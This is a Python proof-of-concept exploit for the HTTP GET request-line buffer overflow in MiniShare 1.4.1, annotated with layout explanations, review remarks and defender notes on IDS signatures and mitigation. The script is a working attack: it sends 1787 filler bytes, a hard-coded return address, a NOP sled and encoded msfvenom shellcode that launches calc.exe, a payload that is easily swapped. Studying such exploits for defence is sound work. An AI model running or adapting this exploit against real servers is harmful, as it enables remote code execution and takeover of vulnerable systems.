#!/usr/bin/env python3
# https://www.exploit-db.com/exploits/616
# https://www.exploit-db.com/apps/0ffe5385147edd1f9e7b460c6d7cb0a6-minishare-1.4.1.zip
# bad_chars = b"\x00\x0d"
# shellcode = msfvenom -p windows/exec -a x86 --platform windows -b '\x00\x0d' -f python -e x86/shikata_ga_nai CMD=calc.exe EXITFUNC=thread
# EIP tested on Win 7 Home x64 fully patched
#
# Proof-of-concept for the MiniShare 1.4.1 HTTP GET request-line overflow
# referenced above (EDB-ID 616). The script opens one TCP connection, sends a
# single oversized GET request and exits; it never reads a response.
#
# Request layout, derived from the lengths used below:
#   "GET " + 1787 * "A"          -> filler up to the saved return address
#   4-byte address (eip)         -> overwrites the saved return address
#   50 * "\x90" + payload (buf)  -> NOP sled and the msfvenom output above
#   20 * "C" + " HTTP/1.1\r\n\r\n" (buf_end)
#
# Defender notes: the resulting request line is ~2 KB and is made of long
# runs of a single byte followed by a 0x90 sled; that shape is what network
# IDS signatures for this bug key on, and a reverse proxy that caps the
# request-line length would reject it before it reaches the server. The
# affected version named by the package link is MiniShare 1.4.1, an
# unmaintained hobby HTTP server; the mitigation is to retire it.
import socket
import struct  # NOTE(review): imported but not used anywhere in this script
RHOST = "172.16.2.3"  # target host; an RFC 1918 private-range address, i.e. a lab box
RPORT = 80            # MiniShare's HTTP listener
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# No socket timeout is set, so an unreachable host blocks here for the OS
# default connect timeout rather than failing promptly.
s.connect((RHOST, RPORT))
# Request-line prefix: the method plus 1787 filler bytes. Per the layout
# above, the overwrite is expected to land right after this filler on the
# target the header names (Win 7 Home x64); the offset is version/build
# specific and is not validated by the script.
buf_start = ""
buf_start += "GET "
buf_start += "A"*1787
# Return-address overwrite, stored little-endian (0x7725cc0b). The header
# records only that it was tested on Win 7 Home x64; which module the
# address points into is not recorded here.
eip = b""
eip += b"\x0b\xcc\x25\x77"
# NOP sled followed by the encoded payload. The payload bytes are the
# msfvenom output described in the header (windows/exec, CMD=calc.exe,
# x86/shikata_ga_nai encoded so that the bad characters 0x00 and 0x0d do
# not appear in the request).
buf = b""  # dead assignment: overwritten unconditionally on the next line
buf = b"\x90"*50
buf += b"\xda\xcf\xd9\x74\x24\xf4\xba\xaa\x02\xa9\x3b\x5e\x2b"
buf += b"\xc9\xb1\x31\x31\x56\x18\x83\xc6\x04\x03\x56\xbe\xe0"
buf += b"\x5c\xc7\x56\x66\x9e\x38\xa6\x07\x16\xdd\x97\x07\x4c"
buf += b"\x95\x87\xb7\x06\xfb\x2b\x33\x4a\xe8\xb8\x31\x43\x1f"
buf += b"\x09\xff\xb5\x2e\x8a\xac\x86\x31\x08\xaf\xda\x91\x31"
buf += b"\x60\x2f\xd3\x76\x9d\xc2\x81\x2f\xe9\x71\x36\x44\xa7"
buf += b"\x49\xbd\x16\x29\xca\x22\xee\x48\xfb\xf4\x65\x13\xdb"
buf += b"\xf7\xaa\x2f\x52\xe0\xaf\x0a\x2c\x9b\x1b\xe0\xaf\x4d"
buf += b"\x52\x09\x03\xb0\x5b\xf8\x5d\xf4\x5b\xe3\x2b\x0c\x98"
buf += b"\x9e\x2b\xcb\xe3\x44\xb9\xc8\x43\x0e\x19\x35\x72\xc3"
buf += b"\xfc\xbe\x78\xa8\x8b\x99\x9c\x2f\x5f\x92\x98\xa4\x5e"
buf += b"\x75\x29\xfe\x44\x51\x72\xa4\xe5\xc0\xde\x0b\x19\x12"
buf += b"\x81\xf4\xbf\x58\x2f\xe0\xcd\x02\x25\xf7\x40\x39\x0b"
buf += b"\xf7\x5a\x42\x3b\x90\x6b\xc9\xd4\xe7\x73\x18\x91\x08"
buf += b"\x96\x89\xef\xa0\x0f\x58\x52\xad\xaf\xb6\x90\xc8\x33"
buf += b"\x33\x68\x2f\x2b\x36\x6d\x6b\xeb\xaa\x1f\xe4\x9e\xcc"
buf += b"\x8c\x05\x8b\xae\x53\x96\x57\x1f\xf6\x1e\xfd\x5f"
# Request-line trailer: 20 filler bytes, the HTTP version token, and the
# blank line that terminates the request headers.
buf_end = ""
buf_end += "C"*20
buf_end += " HTTP/1.1"
buf_end += "\r\n\r\n"
# The str parts are ASCII-only, so .encode() with the default codec is a
# plain byte copy; they are concatenated around the raw byte parts.
buf_full = buf_start.encode() + eip + buf + buf_end.encode()
# Sent once; the socket is neither read from nor closed, so it is released
# only when the interpreter exits.
s.send(buf_full)